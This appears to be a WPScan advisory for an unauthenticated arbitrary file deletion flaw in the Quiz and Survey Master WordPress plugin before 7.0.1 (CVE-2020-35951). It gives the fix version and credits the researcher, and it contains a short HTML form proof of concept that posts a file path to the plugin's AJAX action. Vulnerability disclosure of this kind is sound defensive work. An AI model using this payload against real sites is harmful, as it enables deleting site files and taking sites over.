WordPress Plugin Vulnerabilities

Quiz and Survey Master < 7.0.1 - Unauthenticated Arbitrary File Deletion

Description

This flaw allows users to delete arbitrary files like a site’s wp-config.php file which could effectively take a site offline and allow an attacker to take over the vulnerable site.

Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://YOURURL/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="action" value="qsm_remove_file_fd_question" />
      <input type="hidden" name="file_url" value="/path/to/file" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
quiz-master-next
Fixed in 7.0.1

References

CVE
CVE-2020-35951
URL
https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/

Miscellaneous

Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
https://wordfence.com
Submitter twitter
infosecchloe
Verified
No
WPVDB ID
2c6a695f-7eb6-4d26-9c59-7ced35cd6129

Timeline

Publicly Published
2020-08-13 (about 3 years ago)
Added
2020-08-13 (about 3 years ago)
Last Updated
2021-01-02 (about 3 years ago)

Other

Published
Title
Published
2017-02-01
Title
WordPress 4.7.0-4.7.1 - Unauthenticated Page/Post Content Modification via REST API
Published
2020-04-29
Title
WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated
Published
2018-03-02
Title
NextGEN Gallery < 2.2.50 - Galley Paths Not Secured
Published
2015-03-12
Title
Custom Field Suite <= 2.4 - Insufficient Authorisation
Published
2022-08-17
Title
Titan Anti-spam & Security < 7.3.1 - Protection Bypass due to IP Spoofing